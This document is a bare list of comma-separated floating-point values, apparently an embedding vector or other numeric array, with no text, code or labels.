0.052813317626714706, 0.0010958763305097818, -0.031152814626693726, 0.015224318951368332, 0.0022304824087768793, -0.012808989733457565, 0.012175229378044605, 0.013569501228630543, 0.004010291304439306, -0.021392913535237312, -0.012604777701199055, 0.00022863764024805278, -0.009090932086110115, 0.0042356280609965324, -0.0028994509484618902, -0.012745613232254982, 0.019195880740880966, 0.0006667681154794991, -0.01190764270722866, 0.036729902029037476, 0.04120846837759018, 0.007943122647702694, 0.027547424659132957, -0.0023114627692848444, 0.034701868891716, -0.04323650151491165, -0.014210302382707596, 0.05106695368885994, -0.018294531852006912, 0.00973877590149641, -0.04171547666192055, -0.014984898269176483, 0.022266093641519547, 0.011562595143914223, -0.010393660515546799, 0.03323718160390854, 0.00035494950134307146, -0.043968845158815384, 0.03151898831129074, 0.006957273930311203, 0.03191332519054413, -0.0023554738145321608, -0.02399837039411068, 0.029152950271964073, 0.012534360401332378, -0.018379034474492073, -0.011034461669623852, 0.029321953654289246, -0.007013608235865831, 0.02240693010389805, 0.021688668057322502, -0.0008995868265628815, 0.017111513763666153, 0.04016628861427307, -0.008034666068851948, -0.03743407875299454, 0.020322563126683235, -0.020463399589061737, -0.0009039879078045487, 0.02343502826988697, -0.022040756419301033, 0.017097430303692818, -0.030645806342363358, 0.01753402128815651, -0.007076984271407127, 0.03687073662877083, -0.023477278649806976, 0.025195471942424774, 0.01311882771551609, -0.0005514590302482247, -0.03577221930027008, 0.02618132159113884, 0.030617639422416687, -0.0010474640876054764, 0.011710472404956818, 0.03019513376057148, 0.018491702154278755, -0.006601664703339338, -0.00017813491285778582, -0.016660841181874275, 0.018336784094572067, 0.015590490773320198, 0.02022397890686989, 0.009140224196016788, 0.012555485591292381, -0.019491635262966156, -0.02187175489962101, -0.008886720985174179, 0.022956188768148422, -0.00864730030298233, 0.03506804257631302, -0.018674788996577263, -0.02009722776710987, -0.005679192021489143, -0.0011847787536680698, -0.029969796538352966, 0.009203600697219372, -0.026899581775069237, 0.013393457047641277, -0.03244850039482117, 0.0028888883534818888, 0.008450130932033062, 0.023153357207775116, -0.012999117374420166, 0.006288305390626192, 0.01726643368601799, 0.008076916448771954, 0.0031494339928030968, 0.005080640781670809, -0.018787456676363945, -0.006267180200666189, 0.032927341759204865, 0.04439135268330574, -0.030307801440358162, -0.02211117558181286, 0.05419350415468216, -0.005996071733534336, -0.033631518483161926, -0.019646553322672844, 0.02219567634165287, 0.00440463051199913, 0.02577289752662182, 0.0015113410772755742, -0.026955915614962578, 0.005499626509845257, 0.0027744595427066088, 0.0024575795978307724, -0.005070078186690807, 0.027674177661538124, 0.031209148466587067, -0.0012683997629210353, -0.0068833352997899055, 0.021885838359594345, -0.004179293755441904, 0.00004483630618778989, 0.001799173653125763, -0.013083619065582752, -0.005059515591710806, -0.011104879900813103, 0.02965995855629444, 0.013351206667721272, 0.005911570508033037, 0.012668154202401638, 0.06737570464611053, 0.027167169377207756, -0.004460964817553759, 0.010259866714477539, 0.04258865863084793, 0.005763693246990442, 0.01818186417222023, 0.0005153699312359095, -0.014520141296088696, 0.025167305022478104, -0.026843247935175896, -0.03013879805803299, 0.025491226464509964, -0.004943326581269503, 0.013301913626492023, 0.027533341199159622, 0.005499626509845257, 0.018308615311980247, 0.005172184202820063, 0.004732073284685612, 0.01564682461321354, -0.003950436133891344, -0.02671649679541588, 0.017308684065937996, -0.013484999537467957, -0.02074507065117359, 0.012400566600263119, -0.03684256970882416, 0.01608341559767723, 0.03498354181647301, -0.014245511963963509, 0.021857671439647675, -0.017660772427916527, -0.004925721790641546, -0.0004735593975055963, -0.028082599863409996, -0.04754606634378433, 0.011823141016066074, -0.006879814434796572, -0.0100345304235816, -0.005524273030459881, -0.007858620956540108, 0.017773441970348358, 0.005432729609310627, -0.023660365492105484, -0.037152405828237534, -0.02375894971191883, -0.028758611530065536, 0.021745001897215843, 0.007795245386660099, -0.008034666068851948, 0.015829911455512047, 0.006971357855945826, 0.029772626236081123, 0.010309158824384212, -0.011823141016066074, -0.053235821425914764, 0.006971357855945826, 0.007245986722409725, 0.015956662595272064, 0.009935945272445679, 0.0015113410772755742, -0.0032444980461150408, 0.020646486431360245, -0.024181457236409187, -0.00020938279340043664, -0.009654274210333824, -0.020153561607003212, 0.000044451207941165194, 0.008527589961886406, 0.02036481536924839, 0.03678623586893082, -0.00483417883515358, -0.03320901468396187, 0.019731054082512856, 0.005682712886482477, 0.027251670137047768, -0.02257593162357807, 0.011745681054890156, -0.006003113463521004, -0.0022498471662402153, 0.0037039739545434713, 0.04227881878614426, 0.00887263659387827, -0.020942240953445435, -0.02054790034890175, -0.008999388664960861, -0.007591033820062876, -0.0052390811033546925, 0.04484202712774277, -0.009851443581283092, -0.007224861532449722, -0.009527522139251232, 0.005115849897265434, -0.002938180696219206, -0.035518717020750046, 0.033490683883428574, -0.02402653731405735, -0.02580106444656849, 0.017773441970348358, -0.01140767615288496, 0.016787592321634293, -0.0011073191417381167, -0.011809057556092739, -0.023885702714323997, 0.0031952057033777237, -0.03822275623679161, 0.010865459218621254, -0.025308141484856606, 0.010795041918754578, -0.03078664280474186, 0.009217684157192707, 0.00880926102399826, 0.0021019699051976204, -0.004520819988101721, 0.022477347403764725, -0.007633284665644169, 0.009421895258128643, -0.019590219482779503, 0.013111785985529423, -0.029350120574235916, -0.008928971365094185, -0.020238062366843224, -0.012625903822481632, -0.016449587419629097, 0.013506125658750534, 0.005024306941777468, -0.004270836710929871, -0.03247666731476784, -0.021406996995210648, 0.017365017905831337, 0.014090592972934246, 0.022829435765743256, -0.00376382889226079, 0.015505989082157612, 0.013365290127694607, -0.015618657693266869, 0.017998777329921722, -0.01252731867134571, 0.009492313489317894, 0.001726115238852799, -0.003110704245045781, 0.01443563960492611, 0.012062561698257923, 0.05408083647489548, -0.029772626236081123, -0.014928563497960567, 0.016773508861660957, -0.0009312747861258686, -0.017632605507969856, 0.007964247837662697, -0.015590490773320198, 0.003258581506088376, -0.00593269569799304, -0.014161010272800922, 0.015041232109069824, 0.00913318246603012, -0.009154307655990124, 0.010992211289703846, -0.04365900903940201, -0.003978603053838015, 0.006569976452738047, -0.008330420590937138, -0.002964587416499853, 0.007288237567991018, -0.02620948851108551, -0.006650956813246012, -0.022477347403764725, -0.002381880534812808, 0.03501170873641968, -0.012168187648057938, 0.01475956104695797, 0.02243509702384472, -0.010513370856642723, -0.00012092048564227298, -0.011858349665999413, 0.02113940939307213, 0.017688939347863197, -0.029716292396187782, -0.013492042198777199, -0.0018907167250290513, -0.013330080546438694, -0.0261249877512455, -0.008837427943944931, 0.0014303606003522873, -0.007534699514508247, -0.027603760361671448, 0.0040067704394459724, -0.035518717020750046, 0.05055994912981987, 0.001605524797923863, -0.012654070742428303, 0.005756651517003775, -0.007682576775550842, -0.0019417696166783571, 0.004432797431945801, -0.021942172199487686, -0.037152405828237534, 0.04134930670261383, -0.04067329317331314, 0.0076403263956308365, -0.014970814809203148, -0.013323038816452026, -0.0038201631978154182, 0.0017551624914631248, -0.00851350650191307, -0.022421013563871384, 0.01904096081852913, -0.0455743707716465, -0.017548104748129845, 0.004263794980943203, -0.049067091196775436, -0.02313927374780178, 0.01664675772190094, -0.013337122276425362, 0.02857552468776703, 0.022350594401359558, 0.012520276941359043, -0.019885974004864693, 0.01151330303400755, -0.015139817260205746, 0.02582923322916031, -0.005707358941435814, 0.0005294535076245666, -0.011295007541775703, 0.0009427177137695253, 0.009259934537112713, 0.002234003273770213, 0.011266840621829033, 0.02104082517325878, -0.03132181614637375, 0.009323311038315296, -0.010907710529863834, 0.020153561607003212, 0.00878109410405159, 0.02195625565946102, -0.008626175113022327, 0.007724827621132135, -0.0368989035487175, -0.008985305204987526, 0.0035402525682002306, 0.0123231066390872, 0.0017850900767371058, -0.001719953608699143, -0.012949825264513493, 0.017012929543852806, -0.02844877354800701, 0.02074507065117359, -0.022716768085956573, -0.009041639976203442, -0.009196558967232704, -0.02175908535718918, -0.00045419452362693846, 0.02408287115395069, 0.0010976367630064487, -0.0011645336635410786, 0.0010360211599618196, 0.024603962898254395, 0.018407201394438744, 0.02119574323296547, 0.004982056096196175, -0.015013065189123154, -0.006122823804616928, -0.016801675781607628, -0.018252281472086906, -0.01661859080195427, 0.025575729086995125, 0.011027419939637184, -0.006108740344643593, 0.019857807084918022, 0.027969932183623314, 0.012647029012441635, 0.018195947632193565, 0.022702684625983238, -0.032307665795087814, -0.01774527318775654, -0.05915091186761856, -0.03019513376057148, 0.002364276209846139, 0.0005708239041268826, -0.0014585277531296015, -0.0013476198073476553, -0.025899650529026985, -0.0025561645161360502, -0.00857688207179308, -0.02033664658665657, 0.0057390471920371056, 0.0016618589870631695, 0.004330691881477833, 0.0020174686796963215, 0.006168595515191555, -0.022505514323711395, 0.0061333863995969296, -0.026293989270925522, 0.014224386774003506, 0.011428801342844963, -0.009520480409264565, 0.04022262245416641, -0.02889944612979889, -0.017900193110108376, 0.018463535234332085, -0.0043553379364311695, -0.00795720610767603, -0.026927748695015907, 0.0014039539964869618, -0.030026130378246307, -0.012266772799193859, -0.0308429766446352, 0.015886245295405388, 0.02316744066774845, -0.004165210295468569, -0.0095345638692379, -0.001775407581590116, 0.01197101827710867, 0.015773577615618706, -0.013569501228630543, 0.021153492853045464, -0.0036687650717794895, 0.017604438588023186, 0.00956273078918457, -0.009914820082485676, 0.011844266206026077, -0.03678623586893082, -0.0016821040771901608, -0.011154172010719776, 0.034730035811662674, -0.013055451214313507, -0.019562052562832832, 0.011323174461722374, 0.03453286737203598, -0.00022401647584047168, -0.015308819711208344, -0.02184358797967434, 0.018590286374092102, 0.03140631690621376, -0.02101265825331211, 0.02346319518983364, 0.013724420219659805, 0.006351681426167488, 0.008724759332835674, 0.002563206246122718, -0.0030367656145244837, 0.0016882657073438168, 0.03332168236374855, -0.01012607291340828, -0.023266026750206947, 0.00795720610767603, 0.012147062458097935, 0.002380120102316141, -0.03334984928369522, -0.0012930460507050157, 0.014773644506931305, 0.0012569569516927004, 0.009865527041256428, -0.0225477647036314, -0.030533138662576675, -0.020407065749168396, 0.00821775197982788, 0.00910501554608345, -0.019731054082512856, 0.0182100310921669, 0.03396952524781227, -0.016336919739842415, -0.02084365487098694, 0.009140224196016788, -0.017224183306097984, -0.012154104188084602, 0.0024417357053607702, 0.002642426174134016, 0.006851647514849901, -0.04503919556736946, -0.009971153922379017, -0.0178297758102417, -0.0011390071595087647, -0.01688617840409279, -0.02364628203213215, 0.0062601384706795216, 0.011330217123031616, 0.0015755972126498818, 0.016956595703959465, 0.0008656982681713998, 0.02184358797967434, -0.0022304824087768793, 0.006481954362243414, -0.01761852204799652, -0.013125869445502758, -0.01853395253419876, -0.026899581775069237, 0.034927207976579666, 0.007091067731380463, 0.018815623596310616, -0.013689211569726467, 0.010210574604570866, 0.014914480037987232, -0.022449180483818054, 0.00859096646308899, 0.005605253390967846, 0.00479544885456562, 0.013583584688603878, -0.04672922194004059, 0.01871703937649727, 0.001704109599813819, -0.01478772796690464, -0.004844741430133581, 0.015520073473453522, -0.014041299931704998, -0.03768758103251457, 0.03864526376128197, -0.006770667154341936, -0.01049224566668272, 0.013984966091811657, 0.04689822345972061, 0.026364406570792198, 0.017731189727783203, -0.0334625169634819, 0.0037532662972807884, 0.0017454801127314568, -0.0077037024311721325, 0.031068313866853714, -0.006915023550391197, -0.0033906148746609688, 0.06427732855081558, 0.013104744255542755, -0.017632605507969856, -0.022773101925849915, 0.035406045615673065, 0.005203871987760067, -0.01591441221535206, -0.030589472502470016, -0.013942715711891651, -0.0059432582929730415, -0.0015289455186575651, 0.003436386352404952, -0.010886584408581257, 0.021111242473125458, 0.004101834259927273, 0.017421351745724678, -0.01245690044015646, 0.005721442401409149, 0.012766738422214985, -0.02012539468705654, -0.0327020063996315, 0.008527589961886406, -0.00046519728493876755, -0.021266162395477295, 0.012414650060236454, 0.025040553882718086, -0.005629899445921183, 0.0051757050678133965, -0.014217345044016838, -0.02205483987927437, 0.007091067731380463, 0.0005061276024207473, -0.010316201485693455, 0.00878109410405159, -0.034730035811662674, 0.002207596553489566, 0.017717106267809868, 0.011576678603887558, -0.03405402600765228, -0.02313927374780178, -0.010900668799877167, -0.006633352488279343, -0.028167102485895157, 0.01292870007455349, 0.0011073191417381167, -0.021984422579407692, -0.01544965524226427, -0.004049020819365978, 0.0019259256077930331, 0.008626175113022327, 0.0012622382491827011, -0.007224861532449722, 0.01904096081852913, 0.021421080455183983, -0.010823208838701248, 0.01594257913529873, 0.014942647889256477, -0.022477347403764725, -0.01242873352020979, 0.03343435004353523, 0.02375894971191883, 0.01416805200278759, -0.017703022807836533, -0.0022287219762802124, -0.008090999908745289, 0.005746088922023773, -0.017379101365804672, 0.02060423418879509, -0.00828112754970789, -0.022012589499354362, -0.0055313147604465485, 0.0028712840285152197, 0.001994582824409008, -0.041546475142240524, -0.029152950271964073, -0.02042114920914173, -0.004894034005701542, 0.004742635879665613, -0.002820231020450592, 0.022829435765743256, -0.01659042201936245, 0.006165074184536934, 0.06653069704771042, -0.004207460675388575, -0.020054977387189865, -0.02028031274676323, 0.001959373941645026, -0.021505583077669144, -0.03160348907113075, -0.0097246915102005, -0.011126005090773106, -0.015829911455512047, 0.03196965903043747, 0.00983031839132309, 0.006886856164783239, 0.0368989035487175, 0.000619236147031188, 0.0048200953751802444, 0.04005361720919609, 0.012914616614580154, 0.009274017997086048, 0.0038201631978154182, -0.013639919459819794, 0.02364628203213215, 0.014858146198093891, -0.01823819801211357, 0.014844062738120556, 0.011928767897188663, -0.013477957807481289, 0.022899853065609932, -0.007668493315577507, -0.003872976405546069, -0.007443156559020281, 0.0040631042793393135, 0.013928632251918316, -0.013569501228630543, 0.0003677127242553979, 0.013132911175489426, 0.016421420499682426, -0.004210981540381908, 0.004130001179873943, -0.006327035371214151, 0.009161349385976791, -0.019547969102859497, 0.022646348923444748, -0.019083211198449135, 0.007738911081105471, -0.008443089202046394, 0.025730647146701813, -0.02222384326159954, -0.0013423383934423327, 0.001929446472786367, 0.016224250197410583, -0.028434690088033676, -0.006358723156154156, 0.012597735971212387, -0.0065101212821900845, -0.0048834714107215405, 0.041039466857910156, 0.007633284665644169, -0.01904096081852913, 0.00950639694929123, 0.011921726167201996, -0.0006645675748586655, 0.016421420499682426, -0.006911502685397863, 0.02413920685648918, -0.007260070648044348, -0.010175365954637527, -0.01384413056075573, 0.023223774507641792, 0.0225477647036314, -0.014928563497960567, 0.013097702525556087, -0.0023871618323028088, -0.010027488693594933, 0.016773508861660957, 0.031180981546640396, 0.005122891627252102, 0.0071755689568817616, -0.011154172010719776, -0.02154783345758915, 0.009259934537112713, 0.01046407874673605, -0.03143448382616043, 0.0006051525706425309, -0.01078800018876791, 0.03385685756802559, -0.007034733891487122, -0.010055655613541603, 0.0033694894518703222, 0.0038518512155860662, -0.014632808975875378, -0.019519802182912827, 0.004658134654164314, 0.017379101365804672, 0.0022146382834762335, -0.0006944951019249856, 0.001653056824579835, 0.01643550395965576, -0.008717717602849007, -0.011358384042978287, 0.00845717266201973, 0.020477483049035072, 0.034223027527332306, -0.007281195838004351, -0.02068873681128025, 0.0069291070103645325, -0.008520548231899738, 0.037969253957271576, 0.007562866900116205, -0.00923880934715271, -0.012977992184460163, -0.0018079758156090975, -0.01732276752591133, -0.018815623596310616, -0.017576271668076515, 0.0013432186096906662, 0.013611751608550549, 0.03258933499455452, 0.0015042992308735847, -0.025519393384456635, -0.025758814066648483, -0.0234068613499403, 0.027899514883756638, 0.01478772796690464, 0.0038131214678287506, 0.002559685381129384, -0.008682508952915668, -0.004784886259585619, 0.0035279295407235622, 0.003355405991896987, -0.006239012815058231, -0.029716292396187782, -0.00020014046458527446, -0.027223503217101097, -0.005908049643039703, -0.028533274307847023, -0.025758814066648483, 0.0026811559218913317, -0.01968880370259285, 0.013315997086465359, -0.0014937366358935833, 0.0060312808491289616, 0.0038025586400181055, -0.013294871896505356, 0.020801404491066933, 0.009520480409264565, -0.03151898831129074, 0.01694251224398613, -0.00463348813354969, 0.023012522608041763, -0.0067636254243552685, -0.0015131015097722411, 0.0063235145062208176, 0.020646486431360245, 0.01694251224398613, 0.003483918495476246, 0.010266908444464207, -0.02095632441341877, 0.009252892807126045, -0.022449180483818054, 0.012914616614580154, 0.017872026190161705, 0.033603351563215256, -0.0018924771575257182, -0.0046475715935230255, 0.011506261304020882, 0.031237315386533737, -0.02373078279197216, -0.03427936136722565, -0.019350798800587654, 0.01453422475606203, 0.014815895818173885, -0.031772490590810776, -0.0019048003014177084, 0.018646622076630592, 0.02505463734269142, -0.02706858515739441, 0.0019065607339143753, -0.011020378209650517, 0.0031529548577964306, 0.013287830166518688, 0.007781161926686764, 0.0061545115895569324, -0.003242737613618374, -0.004133522044867277, -0.026984084397554398, -0.017083346843719482, 0.0027234067674726248, -0.030335968360304832, 0.025843316689133644, -0.014900396578013897, 0.046391215175390244, -0.010604914277791977, -0.027913598343729973, -0.021716834977269173, -0.009717649780213833, -0.008295211009681225, 0.00492924265563488, 0.014998981729149818, 0.004960930906236172, -0.012844198383390903, 0.0029205763712525368, 0.006837564054876566, 0.021745001897215843, 0.000323921674862504, 0.0002801306254696101, 0.02213934250175953, 0.006538288667798042, -0.008696592412889004, 0.009421895258128643, 0.01578766107559204, 0.01311882771551609, -0.009323311038315296, 0.015379237942397594, -0.0040067704394459724, -0.03391319140791893, -0.002968108281493187, 0.017519937828183174, 0.00736569706350565, 0.01901279389858246, -0.01629466749727726, 0.01815369725227356, 0.009689482860267162, 0.0003217211051378399, -0.009252892807126045, 0.0168298427015543, 0.04191264882683754, -0.0018555078422650695, -0.005151058547198772, 0.00913318246603012, 0.0031617572531104088, -0.0002933339565061033, -0.0009180714841932058, 0.000708138570189476, -0.0005342946969904006, -0.006319993641227484, -0.012893490493297577, 0.0005871080211363733, 0.008379712700843811, -0.025575729086995125, 0.009041639976203442, -0.0006170355482026935, 0.004362379666417837, -0.006098177749663591, -0.016012996435165405, -0.00022797747806180269, 0.02957545593380928, -0.014576475135982037, 0.007950164377689362, 0.006140428129583597, -0.008950096555054188, -0.02827977016568184, 0.010928835719823837, -0.010182407684624195, -0.02402653731405735, -0.004147605504840612, -0.017970610409975052, -0.005309498868882656, 0.022336510941386223, -0.02963179163634777, 0.011287965811789036, -0.012154104188084602, -0.015872161835432053, 0.014858146198093891, -0.025899650529026985, 0.023871619254350662, -0.019998641684651375, 0.001881914446130395, 0.011456968262791634, -0.022688601166009903, -0.017900193110108376, -0.004432797431945801, 0.025125054642558098, -0.009689482860267162, -0.01052041258662939, -0.03256116807460785, -0.005242601968348026, -0.021026741713285446, -0.0014664496993646026, -0.002855439903214574, 0.019491635262966156, 0.035349711775779724, -0.0011390071595087647, -0.023364610970020294, -0.028237519785761833, 0.020801404491066933, -0.014942647889256477, -0.008921929635107517, 0.0036722859367728233, -0.023618115112185478, 0.002672353759407997, 0.015604574233293533, -0.005552439950406551, -0.029293786734342575, 0.0010853136191144586, -0.00875292718410492, -0.014576475135982037, 0.03703973814845085, -0.0036863693967461586, -0.022660434246063232, 0.009914820082485676, 0.03399769216775894, 0.0020632401574403048, 0.023688532412052155, -0.0036229933612048626, 0.013506125658750534, 0.036701735109090805, 0.009365561418235302, -0.01664675772190094, -0.029350120574235916, -0.01403425820171833, -0.02332236059010029, 0.0032550606410950422, -0.000362871476681903, 0.019026877358555794, -0.011295007541775703, -0.0022410450037568808, 0.019787389785051346, 0.015548240393400192, -0.016548171639442444, -0.029969796538352966, -0.004302524961531162, -0.014618725515902042, -0.011576678603887558, -0.013555417768657207, 0.011780890636146069, 0.00969652459025383, 0.004813053645193577, 0.0062812636606395245, -0.0015157421585172415, 0.010618997737765312, 0.009935945272445679, 0.009766942821443081, 0.029997963458299637, 0.019618386402726173, 0.013069535605609417, 0.018843790516257286, 0.00008136551332427189, 0.0054221670143306255, -0.014632808975875378, -0.02677283063530922, 0.013168119825422764, -0.004703905899077654, 0.006904460955411196, -0.017717106267809868, 0.015491905622184277, -0.009337394498288631, 0.012125937268137932, -0.007323446683585644, -0.014703227207064629, 0.010013404302299023, -0.00785157922655344, -0.022153425961732864, 0.016210166737437248, 0.015238402411341667, 0.02963179163634777, -0.0007983613177202642, -0.004084229934960604, 0.003383573144674301, -0.030392302200198174, 0.013308955356478691, -0.00593269569799304, -0.014245511963963509, -0.028138935565948486, 0.0060524060390889645, -0.013731461949646473, 0.006365764886140823, 0.012372399680316448, -0.03520887717604637, 0.0010817927541211247, -0.0169706791639328, 0.01295686699450016, 0.0003582503122743219, 0.0033342805691063404, -0.010809125378727913, 0.004154647700488567, 0.029688125476241112, -0.00960498210042715, 0.010428869165480137, -0.034758202731609344, 0.011661180295050144, -0.0023413903545588255, 0.01939304918050766, -0.0289839468896389, -0.00312478793784976, -0.0028712840285152197, -0.007457240018993616, 0.015858078375458717, -0.023688532412052155, 0.03929310664534569, 0.029293786734342575, -0.012689279392361641, 0.008288169279694557, 0.02591373398900032, -0.0022727330215275288, -0.004369421862065792, 0.009675399400293827, -0.009316269308328629, 0.009217684157192707, -0.019055044278502464, 0.014984898269176483, -0.029716292396187782, -0.004186335485428572, 0.0069467113353312016, 0.02084365487098694, 0.004140563774853945, 0.01608341559767723, -0.011935809627175331, 0.040983133018016815, -0.006309430580586195, -0.013351206667721272, 0.027491090819239616, -0.019618386402726173, -0.03216683119535446, 0.00851350650191307, -0.02830793708562851, 0.006749541964381933, -0.02588556706905365, 0.007288237567991018, 0.006140428129583597, 0.007013608235865831, 0.031772490590810776, -0.0406169593334198, -0.011316132731735706, -0.00950639694929123, -0.002494548913091421, -0.004439839627593756, -0.0001266419276362285, -0.00960498210042715, 0.005443292204290628, -0.005763693246990442, 0.022083008661866188, -0.023984286934137344, -0.0016838645096868277, -0.0025209556333720684, -0.007738911081105471, -0.0022744934540241957, 0.010393660515546799, -0.03701157122850418, -0.009865527041256428, 0.012977992184460163, -0.010689415037631989, -0.01877337321639061, -0.02278718538582325, -0.03447653353214264, 0.000020808996850973926, 0.000566862931009382, 0.033631518483161926, 0.0018467055633664131, 0.0025086326058954, 0.01750585436820984, 0.005411604419350624, -0.004503215197473764, 0.008252960629761219, -0.016548171639442444, -0.006432661786675453, -0.013823005370795727, 0.004858824890106916, -0.0049468474462628365, 0.0026970000471919775, -0.007907913997769356, -0.0006676483317278326, 0.011914684437215328, 0.021237995475530624, 0.015900328755378723, -0.018407201394438744, -0.020167645066976547, -0.013449790887534618, -0.009950028732419014, -0.029997963458299637, 0.022773101925849915, 0.013132911175489426, -0.010344368405640125, 0.00022280617849901319, 0.0032233726233243942, -0.004425755701959133, -0.01721009984612465, -0.0017146723112091422, -0.0004911638097837567, -0.007115714251995087, 0.021674584597349167, 0.005784818436950445, -0.009450063109397888, 0.0019576135091483593, -0.008076916448771954, 0.025603896006941795, 0.0022181591484695673, 0.0062425341457128525, -0.015520073473453522, 0.013689211569726467, -0.0049010757356882095, -0.003499762387946248, 0.026491159573197365, 0.004182814620435238, -0.008661383762955666, 0.020702820271253586, 0.004872908815741539, 0.00828112754970789, 0.018928293138742447, -0.013421623967587948, -0.011386550962924957, -0.009759901091456413, -0.0011090795742347836, 0.0003578102041501552, -0.005189788527786732, -0.014858146198093891, -0.01121754851192236, -0.006485475227236748, 0.003936352673918009, -0.004517299123108387, 0.02558981254696846, -0.006661519408226013, 0.025420809164643288, 0.019759221002459526, 0.014970814809203148, -0.003094860352575779, -0.013865255750715733, 0.0016979480860754848, -0.047771405428647995, -0.0030737349297851324, 0.001159252249635756, 0.013773712329566479, 0.018379034474492073, -0.003675806801766157, -0.007379780523478985, 0.016308752819895744, 0.004003249108791351, 0.005471459589898586, -0.020590150728821754, 0.005964383948594332, 0.008985305204987526, 0.007372738793492317, -0.007612159475684166, 0.005890445318073034, 0.015365153551101685, 0.017928360030055046, 0.0011161214206367731, -0.011464009992778301, 0.00802762433886528, 0.006555892992764711, 0.004781365394592285, -0.022646348923444748, 0.024688465520739555, 0.005316540598869324, -0.0032198517583310604, -0.0013352966634556651, 0.008795177564024925, 0.008633216843008995, 0.01245690044015646, -0.011555553413927555, -0.0010905949166044593, 0.004390547052025795, -0.005482022184878588, 0.016012996435165405, 0.0006262778770178556, -0.007115714251995087, -0.01659042201936245, 0.01853395253419876, -0.02149149775505066, 0.004302524961531162, 0.003968040458858013, 0.014175093732774258, 0.03875793144106865, 0.0028395960107445717, -0.00001471620998927392, 0.0009189517004415393, 0.001929446472786367, -0.005767214111983776, 0.00887263659387827, -0.0008340102504007518, 0.012935741804540157, -0.012273814529180527, -0.006189720705151558, -0.00035957066575065255, -0.03132181614637375, -0.0105837881565094, -0.006538288667798042, -0.022646348923444748, -0.003159996820613742, -0.01015423983335495, -0.0010360211599618196, -0.010083822533488274, -0.017576271668076515, 0.014984898269176483, 0.011886516585946083, -0.001028979429975152, -0.020759154111146927, 0.008978263475000858, -0.028702275827527046, -0.011555553413927555, 0.005643982905894518, -0.013865255750715733, -0.006168595515191555, -0.0003399857087060809, -0.0007310243090614676, -0.02594190090894699, 0.011647096835076809, -0.0022410450037568808, 0.0016328117344528437, 0.015224318951368332, -0.019857807084918022, 0.01608341559767723, 0.005055994726717472, -0.007330488413572311, -0.016520004719495773, 0.022209759801626205, 0.006020717788487673, -0.003517366945743561, 0.00739386398345232, 0.005084161646664143, 0.0019171233288943768, -0.016210166737437248, 0.00913318246603012, 0.010245783254504204, 0.000150848034536466, 0.00007817470759619027, 0.005756651517003775, 0.030983811244368553, -0.01909729465842247, -0.021702751517295837, -0.0049644517712295055, 0.00647843349725008, -0.004182814620435238, 0.011668222025036812, -0.0025015906430780888, 0.02273085154592991, 0.0308429766446352, 0.0018079758156090975, -0.010647164657711983, 0.00940077006816864, 0.03211049735546112, 0.0028800861909985542, -0.011485136114060879, -0.014287762343883514, -0.018322698771953583, 0.045349035412073135, 0.00021455409296322614, -0.01443563960492611, -0.0011997425463050604, -0.0268854983150959, -0.0008472136105410755, -0.025463059544563293, 0.011182339861989021, -0.0073023210279643536, -0.004281399305909872, -0.003647639648988843, 0.003320197109133005, 0.0021037303376942873, 0.0055066682398319244, 0.02060423418879509, 0.00437646359205246, -0.0200690608471632, 0.017393184825778008, 0.019702887162566185, -0.007020649965852499, -0.039687447249889374, 0.020787321031093597, 0.003269144333899021, -0.005327103193849325, 0.0013634638162329793, 0.02311110682785511, 0.017055179923772812, -0.009097973816096783, -0.0009884892497211695, 0.01578766107559204, 0.01371033675968647, -0.007900872267782688, -0.007309362757951021, -0.0037180574145168066, -0.0010650685289874673, -0.016252417117357254, 0.003932831808924675, -0.005394000094383955, 0.011745681054890156, -0.00012818232062272727, -0.0209281574934721, 0.012900532223284245, -0.009619065560400486, -0.011886516585946083, -0.018787456676363945, -0.006119302939623594, 0.015843994915485382, -0.002563206246122718, 0.0007877986063249409, -0.014675060287117958, -0.01403425820171833, 0.008069874718785286, -0.015294736251235008, 0.021745001897215843, -0.00897122174501419, -0.0008423723629675806, -0.008605049923062325, -0.00864730030298233, -0.00891488790512085, 0.0019100815989077091, -0.03653272986412048, 0.029209284111857414, 0.011745681054890156, 0.0192099642008543, -0.0021125327330082655, -0.005834111012518406, -0.015520073473453522, 0.005186267662793398, 0.009203600697219372, -0.003770870855078101, -0.002468142192810774, 0.012414650060236454, -0.002239284571260214, 0.01968880370259285, -0.017139680683612823, 0.007633284665644169, -0.010886584408581257, -0.006351681426167488, -0.005605253390967846, -0.0019664159044623375, 0.01173159759491682, -0.0016882657073438168, 0.014365222305059433, 0.004760240204632282, 0.0012463942402973771, -0.007133318576961756, 0.01449197344481945, 0.008309295400977135, -0.002677635056897998, -0.015956662595272064, -0.019378965720534325, -0.012801948003470898, -0.0041722520254552364, -0.006922065280377865, 0.0004814814019482583, 0.019914140924811363, -0.011794974096119404, 0.024660296738147736, 0.019083211198449135, -0.00002470122853992507, -0.019674720242619514, -0.010266908444464207, -0.022913936525583267, -0.003260341938585043, -0.00010392120020696893, 0.014055383391678333, -0.008365629240870476, -0.006017196923494339, -0.00223576370626688, -0.0067812297493219376, -0.008745885454118252, 0.015167984180152416, 0.013661044649779797, -0.0028290331829339266, 0.02491380088031292, -0.0015597532037645578, 0.015562323853373528, 0.019407132640480995, 0.008224793709814548, -0.007612159475684166, -0.012766738422214985, 0.004763761069625616, 0.011485136114060879, 0.01635100319981575, -0.002042114967480302, -0.01629466749727726, -0.008013540878891945, -0.013013200834393501, 0.010661248117685318, -0.0002631863462738693, 0.027603760361671448, 0.004112396854907274, -0.03019513376057148, -0.016505921259522438, -0.0028255123179405928, 0.015196151100099087, -0.004186335485428572, 0.003031484317034483, 0.005242601968348026, -0.006862210109829903, -0.010252824984490871, 0.028181185945868492, -0.014238470233976841, -0.01570315845310688, -0.001378427492454648, 0.011421759612858295, -0.009245851077139378, -0.01509756688028574, 0.0023097023367881775, 0.006693207658827305, 0.004341254476457834, -0.0012375920778140426, 0.0018537474097684026, -0.0047109476290643215, -0.007193173747509718, -0.004784886259585619, -0.01718193292617798, -0.0021336579229682684, -0.004784886259585619, -0.00015469900972675532, -0.008421963080763817, -0.020026808604598045, 0.017773441970348358, 0.0015632741851732135, -0.002182950498536229, -0.007224861532449722, -0.032279498875141144, 0.012196355499327183, -0.00923880934715271, 0.009330352768301964, 0.008126208558678627, -0.0029205763712525368, 0.005496105644851923, 0.01842128485441208, -0.013949757441878319, -0.014773644506931305, -0.006013676058501005, -0.028617775067687035, 0.017970610409975052, -0.0020667610224336386, -0.008140292018651962, -0.02222384326159954, 0.02154783345758915, 0.009527522139251232, -0.01667492464184761, 0.0009937705472111702, 0.0013581824023276567, 0.024209624156355858, -0.01980147324502468, 0.018167780712246895, -0.0017877307254821062, 0.036729902029037476, 0.0025966546963900328, 0.013069535605609417, 